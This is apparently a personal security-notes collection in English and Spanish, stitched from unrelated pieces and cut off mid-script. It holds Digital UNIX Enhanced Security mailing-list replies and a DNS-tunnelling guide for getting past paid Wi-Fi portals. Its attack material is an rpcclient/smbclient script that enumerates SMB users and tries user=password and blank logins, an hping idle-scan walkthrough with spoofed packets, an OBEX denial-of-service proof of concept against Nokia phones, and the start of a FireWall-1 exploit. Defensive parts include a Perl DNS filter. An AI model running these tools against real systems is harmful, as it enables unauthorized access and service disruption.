From: Jon Buchanan <Jonathan.Buchanan@ska.com>

You asked for the pros and cons of Enhanced Security. Well, here's my view:

Pros:

+ a protected password database
+ records last successful and unsuccessful logins
+ records repeated login failures
+ automatic lockout after repeated login failure
+ configurable minimum password length
+ password lifetimes
+ password quality checks
+ password change history
+ password usage history
+ GUI for user account maintenance
+ templates for user setup
+ audit subsystem (means C2 security requirements can be satisfied)

Cons:

- performance problems with very large user base (>1000 users)
- NIS doesn't work with other operating systems
- still not as secure as Sun's NIS+
- no (official) failover for NIS master -> single point of failure
- new and not very well understood, even by Digital!

To answer your questions:

1) Turn enhanced security on/off with the secsetup utility. However, if
turning it off, you may find that you need to give all users a new password.

2) Follow the procedures in the 'Security' manual to migrate users from base
to enhanced security. They provide scripts which do it for you.

I think you should decide first whether you want Enhanced Security or not,
and then deal with the admin problems that arise. However, don't base your
decision on the admin problems, base it on your need for security.

Attached is a general list of tips and notes regarding Enhanced Security.
It provides detail on some of the issues just mentioned.

Regards,
Jon Buchanan, Zuerich, Switzerland
[ Jonathan.Buchanan@ska.com ]

Some tips and notes about Enhanced Security:

With enhanced security, your user, group and password databases are
divided into many places:

/etc/passwd
This contains entries for local users not defined under NIS.
Passwords are not stored here - a * appears in place of each password.
Typically you would leave the system users like root, deamon etc here.
NIS-defined users must not appear in this file!
At the end of this file is +: for NIS to be searched.

/tcb/files/auth directories
Users defined in /etc/passwd have security profiles in these
directories. Their passwords, and things like successful/unsuccessful
login info are stored here. No NIS users have profiles in these
directories.

/etc/group
This contains entries for local groups not defined under NIS.
At the end of this file is +:

/var/yp/src/passwd
This is your NIS passwd file.
Local users, defined in /etc/passwd, should NOT appear here!
Passwords are not stored here - a * appears in place of each password.
The file should not contain +:

/var/yp/src/prpasswd
This is the 'protected password' NIS file, which functions like the
/tcb directory but for NIS users instead of local users. All users
with an entry in the NIS password file have an entry here.

/var/yp/src/group
This is the NIS group file.
Local groups, defined in /etc/group, should NOT appear here!
The file should not contain +:

Creating the prpasswd file is described in the section 'Moving Local
Accounts to NIS' in the 'Security' manual. You have to copy the script
they give you in the book, which reads all the information from the /tcb
tree and writes it into a file with one line per user. After that you
need to:

- delete (or move) all security profiles below /tcb for NIS registered
users
- delete all prpasswd entries for locally registered users (like root)

this is in accordance with the split described above.

When you are using the advanced security XIsso and XSysAdmin tools you
choose whether to manage the local or NIS registered users by clicking
on the 'Network Control' button. It then updates only the appropriate
files, and in the case of the NIS files, does a make for you.

To change passwords, use passwd for all accounts including the NIS ones.

/etc/svc.conf should contain an entry like: auth=local,yp

Delete the files /etc/passwd.dir and passwd.pag if you have them. These
are 'hashed' password files which adduser offers to make for you when it
finds they are not there. However, you don't need them and it will
probably stop NIS from working properly.

The main problem with switching Enhanced Security/NIS on and off is in
restoring the information to the correct place. Above all, Enhanced
Security passwords CANNOT be re-inserted into the passwd files (in place
of the *'s) - you need to give all users a new password.

A couple of problems that took us a long time to solve:

- The file /etc/auth/system/files must contain entries for
prpasswd and prpasswd:t. We have added them like this:

/var/yp/src/prpasswd:\
:f_type=r:f_mode#0660:f_owner=auth:f_group=auth:\
:chkent:
/var/yp/src/prpasswd\:t:\
:f_type=r:f_mode#0660:f_owner=auth:f_group=auth:\
:chkent:

- An Enhanced Security NIS Slave cannot operate independently of the
Enhanced Security NIS Master. This is because the prpasswd file
is updated with every login attempt, and is only mastered on the
NIS Master. In other words, there's no point having a Slave because
it won't be able to function without the Master running.

DEC have refused to acknowledge this as a problem, so a fix is
unlikely for the forseeable future. We have worked around it by
setting up a second Master and copying certain files from the
'real' master to the 'second' master periodically using rdist.
It is not an altogether satisfactory solution but it works and we
prefer it to being dependent on the availability of one machine.
Let me know if you would like more details on setting this up.

If you are determined to set up a Slave then you may hit another problem
too, whereby a make of the yp maps pauses for a few minutes. Fix is to
send the Slave the copies of the maps which it is missing by using ypxfr
(but a better fix is to disable the Slave).

One other note about Enhanced Security - if your system manages X
sessions for X displays (such as PCs) then you will need to add entries
for these remote displays to the files /etc/auth/system/devassign and
/etc/auth/system/ttys. I can let you have more details if you need
them.

From: Spider Boardman <spider@Orb.Nashua.NH.US>

I'm afraid your question didn't make a lot of sense to me, unless
I assume that you don't have Enhanced Security in use, but that
you merely have its subsets installed (which is not enough to
enable it).

In particular, check the output of running this command:
/usr/sbin/rcmgr get SECURITY BASE
If it's BASE then you've not enabled Enhanced Security.

The /usr/sbin/secsetup script is supposed to take care of
creating prpasswd entries (the /tcb/files/auth/?/* files) for the
users which were already in /etc/passwd when you enable the "C2"
login features. If it didn't, then that's a bug. I do seem to
recall that the adduser script had a bad habit of creating
prpasswd entrries even when it shouldn't, because it didn't check
the result of the rcmgr command above. Unless that returns
ENHANCED you're still using "BASE" security.

Que utlizaremos para bruteforce de sap R/3

Hace falta tener las librerias RFCSDK de SAP:

Explican algo en el modulo de perl de SAP-RFC:

http://www.cpan.org/modules/by-module/Apache/SAP-Rfc-1.31.readme


Thanks to Achim Grolms who supplied the following information :-

where RFCSDK should be /usr/sap/rfcsdk as a standard

----

Aunque yo he tenido que bajar RFC_OPT_46C.SAR del mismo ftp y
descomprimirlo tambien con SAPCAR. Cambiar el tema del $RFCSDKHOME por /usr
por que si no el configure del hydra no se entera.

En el mismo SAR vienen utilidades de interes, como sapinfo

If you are not sure if the optional, enhanced-security features are
installed on your system, you can check as follows:

$ ls -l /usr/.smdb./OSFC2SEC4??.lk
-rw-r--r-- 1 root system 0 Nov 8 11:02 \
/usr/.smdb./OSFC2SEC400.lk

The presence of the lock file (OSFC2SEC400.lk) indicates that the enhanced
security subset is installed (but not necessarily running) on your system. If
the subset is not installed, you will receive a "not found" message.

To determine if the installed enhanced security is running on your system,
enter the following command:

$ /usr/sbin/rcmgr get SECURITY BASE
ENHANCED

If the string "ENHANCED" is returned, enhanced security is running. If the
string "BASE" is returned, enhanced security is not running

Desde:
http://www.cs.arizona.edu/computer.help/policy/DIGITAL_unix/AA-Q0R2D-TET1_html/sec.c23.html

Comprobacion de usuarios por defecto en oracle (script sql)

Viene de:
http://www.pentest.co.uk/sql/check_users.sql

Mirror:http://www.pentest.co.uk/sql/check_users.sql

Comprobacion de distintos aspectos de seguridad:

De: class="foo">http://www.pentest.co.uk/sql/scanner.sql
Mirror: class="foo">http://www.pentest.co.uk/sql/scanner.sql

awk '/INFECTED/ { print $8}' /var/log/maillog.1 | \
sed -e 's,(\(.*\))\,,\1,' | sort | uniq -c | sort -nr

Otra opicion:
-------------------------------------------------------------------

valerts=/var/mail/virtual/unsec.net/virusalert
var1=`grep "Subject: VIRUS" $valerts | sed -e 's,.*(\(.*\)).*,\1,g' \
| sort | uniq -c| sort -nr`
var2=`grep -A1 'The message WAS NOT delivered to' $valerts | \
grep -e '^<.*:$' | sed -e 's,<\(.*\)>:,\1,' \
| sort | uniq -c | sort -nr`
var3=`echo "$var1" | awk '{ print $1 }' | tr '\n' '+' | sed -e s,.$,,`
var4=$(( $var3 ))
echo " "
echo ".:[ Estadisticas generales ]:."
echo "------------------------------"
echo "Numero total de mails infectados: $var4"
echo " "
echo ".:[ Virus encontrados ]:."
echo "-------------------------"
echo "$var1"
echo " "
echo ".:[ Recipientes con mas virus ]:."
echo "---------------------------------"
echo "$var2"

secedit /configure /cfg %windir%\repair\secsetup.inf /db secsetup.sdb /verbose

Post de antirez

The Players:

host A - evil host, the attacker.
host B - silent host.
host C - victim host.

- Se comprueba que el host B es "idle" viendo que no aumenta el "id"
nuestros paquetes (+1)
#hping B -r
HPING B (eth0 xxx.yyy.zzz.jjj): no flags are set, 40 data bytes
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=0 ttl=64 id=41660 win=0 time=1.2 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=1 ttl=64 id=+1 win=0 time=75 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=2 ttl=64 id=+1 win=0 time=91 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=3 ttl=64 id=+1 win=0 time=90 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=4 ttl=64 id=+1 win=0 time=91 ms
60 bytes from xxx.yyy.zzz.jjj: flags=RA seq=5 ttl=64 id=+1 win=0 time=87 ms

-Se envian paquetes a C spoofeando con B mientras se comprueban los ids en otra ventana
#hping C -a B -S

--------------------------
nmap lo soporta con -sI

Aunque lo realmente interesante es que ofrece bruteforce para web, tambien hace
otras cosas como scaneo de cgis y banners.
babelweb
Dejo copia en local por que luego seguro que no lo encuentro:
babelweb

La mejor forma de hacer un scan (definitivamente) es con nmap, ni icmpenum
ni sing, ni leches...

nmap -sP -PM -PE -PP -PS21,22,25,53,80,110,135,143,139

Aunque no entiendo como no han metido "Information Request" (tipo 15),
como una de las opciones -Px de nmap.

Ademas del limitado numero de puertos en el parametro -PS (tcp syn)

Actualizado: Fri Aug 15 01:55:55 CEST 2008 (de charla dc de fyodor)

nmap -sP -PE -PP -PS21,23,25,80,113,31339 -PA80,113,443,10042 --source-port 53 -T4

Cuatro años después, el man explica el porque no del Information Request }:>

Se utiliza la herramienta 'rpcclient' de samba 3, es mucho mas
completa la que tiene el fork de samba samba-tng, pero por
no andar instalandola...

Una manera sencilla de hacerlo es:

---- cut here ----
for rid in `rpcclient -I -W \
-c "enumdomusers" | sed -e 's,.*\[\(.*\)\],\1,'`;
do
rpcclient -I $IP -W \
-c "queryuser $rid" | awk '/User Name/ {print $4}'
done
---- cut here ----
Nota: tener en cuenta que si no tenemos acceso al IPC$ como anonimo
tendremos que autenticarnos usando -U en el comando rpcclient

Para simular lo que hace cerberus nbtdump.exe en linux (ver usuarios sin
contraseña o con user=pass), a modo guarro, se podria usar lo siguiente:

----- cut here ----
IP=$1
USER=$2
PASS=$3

NMBLOOKUP=`nmblookup -A $IP 2>/dev/null`
if [ `echo -e "$NMBLOOKUP"|wc -l` -lt 5 ]; then
echo "Netbios not found"
exit 1
fi

SISTEMA=`echo "$NMBLOOKUP"| awk '/<20>/ { print $1 }'`
WORKGROUP=`echo "$NMBLOOKUP"| awk '/<1e>/ { print $1 }'`

for rid in `rpcclient -I $IP -W $WORKGROUP $SISTEMA \
-U$USER%$PASS -c "enumdomusers" | \
sed -e 's,.*\[\(.*\)\],\1,'`;
do
u="$u\n"`rpcclient -I $IP -W $WORKGROUP $SISTEMA -U$USER%$PASS \
-c "queryuser $rid" | awk '/User Name/ {print $4}'`
done
if [ $(echo -e "$u" | grep -E "[:alpha:]" | wc -l) -gt 0 ]; then
echo -e "Lista de usuarios:\n------------------$u"
else
echo -e "Lista de usuarios:\n------------------\nSin acceso"
fi

for user in `echo -e "$u"`; do
n=`smbclient -L //$SISTEMA -I $IP -W $SISTEMA -U$user%$user 2>&1`
if [ `echo -e "$n"|grep -E "ACCESS_DENIED|NT_STATUS_LOGON_FAILURE" | \
wc -l` -eq 0 ]; then
r="$r\n$user/$user"
fi
n=`smbclient -L //$SISTEMA -I $IP -W $SISTEMA -N -U$user 2>&1`
if [ `echo -e "$n"|grep -E "ACCESS_DENIED|NT_STATUS_LOGON_FAILURE" | \
wc -l` -eq 0 ]; then
r="$r\n$user/$user"
fi
n=`smbclient -L //$SISTEMA -I $IP -W $SISTEMA -N -U$user 2>&1`
if [ `echo -e "$n"|grep -E "ACCESS_DENIED|NT_STATUS_LOGON_FAILURE" | \
wc -l` -eq 0 ]; then
r="$r\n$user contraseña en blanco"
fi

done

if [ $(echo -e "$r" | grep -E "[:alpha:]" | wc -l) -gt 0 ]; then
echo -e "Accesos:\n---------$r"
fi
----- cut here ----

TODO: mirar de modificar el rpcclient par hacer esto

+---------------------------------------------------------------+
| Guia rapida de tunneling IP sobre DNS Alejandro Ramos |
| 29/Mar/2005 v0.2 aramosf@unsec.net |
+---------------------------------------------------------------+

/ 1.- Introduccion /
+--------------------+

El proposito de esta guia es crear un tunel IP sobre el protocolo DNS
para conseguir salir a Internet en un entorno donde al unico servicio que
podemos acceder es un DNS que nos resuelve direcciones de Internet.

Muy practico para redes wireless en las que te permiten asociarte pero solo
te dan salida una vez te has autentificado via HTTP, previo pago. Como por
ejemplo en aeropuertos y hoteles. Estos sitios suelen tener un DNS que
resuelve dominios de Internet, requisito indispensable.

El siguiente texto va a mostar un ejemplo practico de una de estas confi-
guraciones.

El funcionamiento es sencillo, se desarrolla un servidor DNS que responde
a determinadas peticiones encapsulando en Base32 (si se realizan peticiones
mediante CNAME) o en Base 64 (si son registros TXT). El cliente sera capaz de
desencapsular la codificacion de la peticion y generar el paquete correcto.

En la actualidad existen dos aplicaciones que nos permiten realizar un
tunel atraves de DNS: nstx (http://nstx.dereference.de/nstx/) y ozymandns
(http://www.doxpara.com/). Se muestra una lista comparativa:

Ventajas de ozymandns:
* Esta escrito en perl, por lo que se puede portar a cualquier sistema
que soporte este interprete.
* Es sencillo y rapido de configurar.
Inconvenientes de ozymandns:
* Solo permite realizar un SSH o hay que realizar un tunel ssh posterior.
* El software es beta e inestable.

Ventajas de nstx:
* Permite usar cualquier tipo de servicio.
* Software antiguo y mas comprobado.
* Existen paquetes para algunas distribuciones (debian sid).
Inconvenientes de nstx:
* Tanto servidor como cliente tiene que ser linux.
* Se necesita crear un tunel con tun/tap.

Ademas de estas aplicaciones existen otras que nos permiten enviar
y recibir ficheros por DNS o usarlo para encapsular VoIP.

OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO
J J
O Ambos sistemas no usan autenticacion, alguien que conozca la O
J configuracion que se ha realizado en su sistema podria usar J
O el tunel DNS. O
J J
OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO-OJO

/ 2.- Requisitos /
+------------------+

Partimos de la premisa de que tenemos un conocimiento basico de como funciona
un servidor DNS y cuales son sus tipos de registros; A, NS, TXT...

Una configuracion tipo, en la que nuestros dispositivos van marcados entre
asteriscos podria ser la siguiente:

[*PC cliente*] ~~ wireless ~~ [ AP ]
|
[ switch ]-----[ server DNS (con acceso) ]
|
[ router ]
|
/\/\/\/\/\
[*server DNS*]-------|Internet|-----[*server tunel*]
\/\/\/\/\/

Por lo que seria necesario:
- Cliente desde el que realizar el tunel.
- Servidor DNS que podamos administrar y en el que tengamos un dominio.
- Servidor tunel, donde correra la aplicacion servidor.
- Acceso como cliente a un servidor DNS

En el ejemplo que se usara a lo largo del texto se usaran los siguientes
datos:
- Server DNS (con acceso): 10.1.2.2, sera el DNS al que tengamos acceso
como cliente y que ha de ser capaz de resolver nuestro dominio.
- Server tunel: este sistema es nuestro y en el instalaremos la parte
que sirve peticiones, es necesario que un DNS pueda preguntarle y para ello
necesita el 53/udp abierto a Internet.
- Server DNS: es indistinta la IP.

/ 3.- Configuracion DNS /
+-------------------------+

Si se tiene claro el concepto de recursividad en DNS y como funciona
no tendria por que encontrar ninguna dificultad a la hora de configurar
el dominio para poder realizar el tunel.

En el ejemplo se va a utilizar el dominio 'digitalsec.net' como referencia.

Editamos el fichero de zona de digitalsec.net, en este caso (fedora core 3
con named enjaulado): /var/named/chroot/var/named/db.digitalsec.net, y se
a?aden los siguientes registros:

t.digitalsec.net. IN NS tun.digitalsec.net.
tun IN A 65.73.147.191

Con estos dos registros lo que se esta haciendo es enviar al sistema
tun.digitalsec.net (65.73.147.191) todas las peticiones que cuelgen de
t.digitalsec.net. Es decir, si alguien pregunta por 'foo.t.digitalsec.net' el
servidor DNS que esta escuchando en t.digitalsec.net (65.73.147.191) sera el
encargado de resolver esas peticiones.

En 65.73.147.191 es donde ha estar el servidor de tunel DNS.

Esta configuracion es comun para nstx y ozymandns. Las pruebas que se han
realizado han sido con bind y todo ha funcionado correctamente, por lo que he
visto en el paquete de debian, con djbdns hace falta parchear para el caso de
nstx. Asi que si no se desean complicaciones adicionales, lo mas sencillo es
usar bind.

/ 4.- Configuracion ozymandns /
+--------------------------------+

Se obtiene el software de su url oficial: http://www.doxpara.com/, en la
actualidad la ultima version es: http://www.doxpara.com/ozymandns_src_0.1.tgz.
Para que ozymandns funcione son necesarios una serie de modulos CPAN,
se puede encontrar informacion detallada de como instalarlos en la direccion:
http://www.cpan.org/modules/INSTALL.html. Muchas distribuciones tienen
algunos de estos modulos como paquetes, por lo que no seria necesario insta-
larlos manualmente y compilarlos.

Los scripts necesarios para hacer funcionar el tunel son: nomde.pl (servidor)
y droute.pl (cliente), las demas aplicaciones incluidas en el tarball son para
otros propositos.

Una vez que se haya terminado de instalar todo lo necesario al ejecutar
los scripts en perl, no ha de existir ningun problema y ha de mostrar la ayuda:

# perl nomde.pl
nomde 0.1: Experimental DNS Server
Component of: OzymanDNS Dan Kaminsky(dan@doxpara.com)
Usage: nomde -l 10.0.1.11 servername.foo.com
Options: -i [ip address]: IP address to host for all A requests
-f [filename] : Filename to host in TXT records [b64]
-p [name] : Name/IP to return for reverse lookups[ptr]
-L [name:host:port]: Forward function to address, port
(Default: sshdns:127.0.0.1:22)

Hay que tener en cuenta que esta aplicacion es una beta y tiene algunos
fallos; la ayuda no se corresponde con las opciones reales y en el caso
concreto del "nomde.pl", el parametro -L no funciona como se espera. Este punto
se vera mas adelante cuando se configure el servidor.

- PARTE SERVIDOR - :

Este es el servicio que se ejecutara en el servidor del tunel, exactamente
en la direccion tun.digitalsec.net (65.73.147.191).

El siguiente comando dejaria lista esta parte:

# ./nomde.pl -i 127.0.0.1 t.digitalsec.net
creating TCP socket...done.
creating UDP socket...done.
waiting for connections...

Esto, por defecto permite hacer un ssh a 127.0.0.1 (es decir, al servidor que
realiza el tunel o tun.digitalsec.net) al puerto 22, esto es teoricamente
modificable con la opcion "-L", pero por un bug no funciona y si se desea que
el SSH se haga contra otra IP y puerto, habra que modificarlo en el codigo
fuente:

Con cambiar la linea 32 de nomde.pl:
"Localforward"=> \$opts{forward}
por la siguiente:
"Localforward=s"=> \$opts{forward}

Tendremos solucionado el problema.

Este comando nos permitira hacer un SSH al puerto 2222 de 82.165.25.126

# ./nomde.pl -i 127.0.0.1 -L sshdns:82.165.25.126:2222 t.digitalsec.net
creating TCP socket...done.
creating UDP socket...done.
waiting for connections...

Por otro fallo el script se "cae" de vez en cuando, para que se vuelva a
ejecutar cada vez que falle, se puede utilizar alguna solucion temporal como
la siguiente:

# while true; do ./nomde.pl -i 127.0.0.1 t.digitalsec.net; done

- PARTE CLIENTE - :

Seguiremos los mismos pasos que en el servidor para instalar los modulos
CPAN necesarios para que la ejecucion del script "droute.pl" no de ningun
problema.

# ssh -p2222 -o ProxyCommand="droute.pl sshdns.t.digitalsec.net" \
aramosf@82.165.25.126

Con esto se realizara un SSH al sistema que se le especifico anteriormente en
el servidor con la opcion -L. Notese que se ha a?adido "sshdns" delante de
t.digitalsec.net. Otra apreciacion es que el usuario y direccion IP solo seran
utilizados a la hora de comprobar si existe llave privada o si el sistema remoto
es un "know host". Si se desea cambiar la direccion destino del SSH ha de ser
en el servidor de tunel (nomde.pl) con la opcion -L.

El script droute.pl si se desea ejecutar en windows, se puede hacer mediante
el perl y el ssh de cygwin, usando los modulos de CPAN. Aunque es posible que
funcionei tambien bajo el perl de ActiveState y con otro cliente de SSH que
soporte la opcion una opcion como "ProxyCommand" del cliente openssh.

/ 5.- Configuracion nstx /
+--------------------------+

Para que nstx funcione es requisito tener compilado el kernel de los
sistemas linux con soporte para ethertap/tun. Tanto cliente como servidor.

Device Drivers --->
Networking support --->
Universal TUN/TAP device driver support

Hay veces que es necesario crear el dispositivo a mano:

# mkdir /dev/net
# mknod /dev/net/tun c 10 200

NOTA: La configuracion de tun0 tanto en servidor como en cliente se realiza
DESPUES de arrancar las aplicaciones.

- PARTE SERVIDOR - :

Se instalara como en el caso de ozymandns en tun.digitalsec.net
(65.73.147.191). Descargar el software desde: http://nstx.dereference.de/nstx/.
La ultima version en la actualidad es: nstx-1.1-beta6.tgz

Como ya se explico anteriormente, es posible que existe un paquete
con los binarios necesarios. En el caso de debian sid, el paquete se llama
"nstx", y con instalarlo con el comando "apt-get install nstx" seria suficiente,
solo habria que proceder a configurarlo en el fichero: /etc/default/nstx.

Una vez descomprimido y compilado:

# tar -zxvf nstx-1.1-beta6.tgz
# cd nstx-1.1-beta6
# make

Se tendran los binarios necesarios para la ejecucion en la parte del servidor,
que sera ejecutado con la opcion para que cambie el UID del usuario a nobody y
deje el servicio en background:

# ./nstxd -u nobody -D t.digitalsec.net
Opening tun/tap-device... using device tun0
Please configure this device appropriately (IP, routes, etc.)
Opening nameserver-socket... listening on 53/UDP

Cargar el modulo de TUN:

# modprobe -a tun

Por ultimo, se configura el interfaz con una IP interna (la que se desee):

# ifconfig tun0 172.26.0.2 netmask 255.255.255.0

- PARTE CLIENTE - :

Realizar el mismo proceso de descarga y compilacion del tarball nstx para
la parte del cliente.

Cargar el modulo de TUN:

# modprobe -a tun

Lanzar el cliente apuntando a t.digitalsec.net y al DNS al que tengamos
acceso como cliente en el ejemplo, 10.1.2.2:

# ./nxstcd t.digitalsec.net 10.1.2.2

Finalmente, configurar el dispositivo tun0 con un interfaz en la misma red
que el servidor:

# ifconfig tun0 172.26.0.1 netmask 255.255.255.0

Con esto ya deberia de existir conectividad con nuestro cliente y la ip del
servidor remoto: 172.26.0.2

/ 6.- Contramedidas /
+--------------------+
Una de las posibles opciones para evitar peticiones CNAME es usando iptables
en el router/firewall con una regla similar a esta:

# iptables -t filter -A INPUT -p udp --dport 53 \
-m string --string "CNAME" -j DROP

Para utilizar "string" en iptables, es necesario aplicar el corresponidente
parche de "patch-o-matic". El problema de utilizar este metodo es la bajada de
rendimientto del sistema, y el gran numero de paquetes que se descartan que son
falsos positivos, ademas, implementar el mismo filtro para TXT resultaria una red
con excesivos paquetes eliminados.

Una alternativa es utilizar un servidor de DNS que no acepte peticiones de la
clase TXT ni CNAME, o que compruebe el tamanyo de la respuestas para localizar
posibles peticiones empaquetadas.

El siguiente ejemplo muestra un script bastante simple en perl que realiza
esta funcion.

--------------------------------------------------------------------------------

#!/usr/bin/perl
# Mon May 16 00:00:44 CEST 2005
# Last version at: http://www.unsec.net
#
# proxy-dns, check lengh of respones and deny TXT records
#
# BUGS: All Net::DNS bugs -> SLOW!
#

use Net::DNS::Nameserver;
use Net::DNS::Resolver;
use Net::DNS;
use Getopt::Long;
use POSIX qw(strftime);
use strict;

my ($daemon, $log, $verbose, $ns, $help, $length);

my $length = 100;
my $log = "/dev/stdout";
GetOptions(
"daemon" => \$daemon,
"log=s" => \$log,
"ns=s" => \$ns,
"length=s" => \$length,
"verbose" => \$verbose,
"help" => \$help);

if(defined($help)) {
print STDERR <<"EOD";
Syntax: $0 [--daemon] [--log ] [--verbose] [--ns ] [--help]
Options:
--daemon : run script as daemon
--log : log all querys to (default: STDOUT)
--ns : use instead /etc/resolv.conf
--length : use of maximum length of reply (default: 100)
--verbose : verbose output
--help : this help
EOD
exit 1;
}

if (defined($daemon)) {
defined(my $pid = fork) or die "Error: $!";
exit if $pid;
}

open LOG, ">>$log";
print LOG scalar(localtime) . " [$0] Starting service\n";
sub reply_handler {
my ($qname, $qclass, $qtype, $peerhost) = @_;
my ($rcode, @ans, @auth, @add, $ret, $r1, $r2);
my $res = Net::DNS::Resolver->new;
$res->nameservers("$ns") if defined $ns;
my $query = $res->query($qname, $qtype);
if ($query) {
foreach my $rr ($query->answer) {
next unless $rr->type eq "$qtype";
$ret = $rr->address if $qtype eq "A";
$ret = $rr->ptrdname if $qtype eq "PTR";
$ret = $rr->nsdname if $qtype eq "NS";
if ($qtype eq "MX") {
$ret = $rr->preference . " " . $rr->exchange;
}

if (($qtype ne "TXT") || length($ret) gt $length) {
my ($ttl, $rdata) = (3600, "$ret");
push @ans, Net::DNS::RR->new("$qname $ttl $qclass $qtype $rdata");
print LOG scalar(localtime) . " [$0] $qname -> $qclass $qtype " .
"from: $peerhost reply: $rdata\n";
$rcode = "NOERROR";
} else {
print LOG scalar(localtime) . " [$0] $qname -> $qclass $qtype " .
"from: $peerhost reply: REFUSED(".length($ret).")\n";
$rcode = "REFUSED";
}
}
} else {
print LOG scalar(localtime) . " [$0] $qname -> $qclass $qtype " .
"from: $peerhost reply: NO ANSWER\n";
$rcode = "NOTAUTH";
}
return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
}

my $ns = Net::DNS::Nameserver->new(
LocalPort => 53,
ReplyHandler => \&reply_handler,
Verbose => $verbose,
) || die "couldn't create nameserver\n";

$ns->main_loop;

close LOG;
--------------------------------------------------------------------------------

/ 7.- Referencias /
+------------------+

http://www.doxpara.com/Black_Ops_DNS_BH.ppt
http://www.aripollak.com/wiki/Main/SSHOverDNS
http://slashdot.org/articles/00/09/10/2230242.shtml

/ 8.- Control de cambios /
+-------------------------+

lun may 16 00:53:54 CEST 2005
+ Añadido punto de contramedidas.
+ Version en ingles.
+ Añadido control de cambios.

Herramientas para auditar SNMP

ADMsnmp
onesixtyone
pysnmp
snmp-python
snmpbrute-fixedup
SNscan-Foundstone
NetScanTools Pro

De un thread de pen-test

http://www.cqure.net/tools.jsp?id=11
Lodowep is a tool for analyzing password strength of accounts on a Lotus Domino webserver system. The tool supports both session- and basic-authentication. It runs 20 simultaneous connection guessing passwords specified in a dictionaryfile against the supplied userfile. The tool is written in java and is released under the GPL version 2.

http://usuarios.lycos.es/reinob/
Lepton's Crack is a generic password cracker, easily customizable with a simple plug-in system. It can perform a dictionary-based (wordlist) attack, as well as a brute-force
(incremental) password scan, including enumeration of a regular expression
(useful if you know something about the password). Currently the formats supported are: standard MD4 hash, standard MD5 hash, NT MD4/Unicode, Lotus Domino HTTP password (R4) and SHA-1. LM (LAN Manager) support added by Piero Brunati, see below.

http://www.nestonline.com/lcrack/
Port de LCrack con soporte de otros cifrados.

http://packetstormsecurity.org/Crackers/dhb.zip
Lotus Domino HTTP password

http://packetstormsecurity.org/UNIX/scanners/DominoHunter-0.92.zip
Domino Hunter 0.92 is a Lotus Domino web server scanner, written in Perl. It attempts to access default NSF databases, as well as crawl user-defined bases. It tries to enumerate the database structure, enumerate available views, available documents, and ACLs set on documents. It also tries to retrieve documents from available views in order to check if ACLs are correctly set to restrict documents and not views. The scanner works in both anonymous mode or privileged mode if user supplied credentials are supplied to then be passed to the default names.nsf/?Login form.

http://packetstormsecurity.org/UNIX/scanners/domino.tar.gz
Domino.pl is a perl script which checks for remote vulnerabilities in lotus Domino servers.

DOCUMENTACION:
Es bastante pobre lo que hay:

Security HandBook (RedBook de IBM)

Lotus Notes and Domino R5.0 Security Infrastructure Revealed

ISS domino

Freeware:

Paros proxy (java)

WebScarab (java)

Achilles

Spike

RatProxy

ProxyStrike

ProxMon

Pantera



Windows:

Fiddler

TamperIE (plugin IE)

Odysseus

Comercial:

Webproxy (descontinuado)

Burp Tools

HttpWatch (windows, IE plugin)

Suru

Charles

Severity: Low
Affected: tested in nokia 7610 and nokia 3650 (maybe others symbian
phones).
Problem type: remote

Details:
--------------------------------------------------------------------------------
--------------------------

They are some flaw in the OBEX implementation in nokia 7610 (V4.0.437
15-09-04 RH51), and others, that disable this service if you send
archive with name ":" or "\".

----
Quote of IROBEX12.pdf Pag:40, section 4.3 -- (OBEX specification)

"Pushing objects into the inbox Objects are pushed into the inbox by using
the PUT command with a Name header. The string in the Name header
should not contain any path characters such as ':', '/' or '\'. Objects with
improperly formed names should be rejected."
----

The device ask for PIN if you are not paired or ask if you want accept a
connection of the remote box, you need ACCEPT. It have low risk ,
becouse dont work if you dont accept the incoming connection.

If connection is established, the file is sended and they arent "New
message arrived" message, like when you send correct archive. Its ok,
the filename is dropped.

The problem is the OBEX service dont work anymore after this, if you
tried to send other file or from some vcard from other device, you cant
connect to the remote OBEX service again.

Demostration with Linux as client:

jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610

jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()

# Error pushing other file after send ":" filename:

jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
--------------------------------------------------------------------------------
--------------------------

Timeline:
20 Sept 2005: bug found.
21 Sept 2005: Nokia security contacted.
24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).
26 Sept 2005: Full disclosure.

dab @ !dSR
http://www.digitalsec.net

#!/usr/bin/perl
# Wed Dec 14 01:44:29 CET 2005
# Get private address from fw-1, nothing new, only a working port.
# ref: http://www.securityfocus.com/bid/8524/info
# !dSR www.digitalsec.es

use strict;
use IO::Socket;

my ($bytes, $host, @hosts) = ();
my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0], PeerPort => 256,
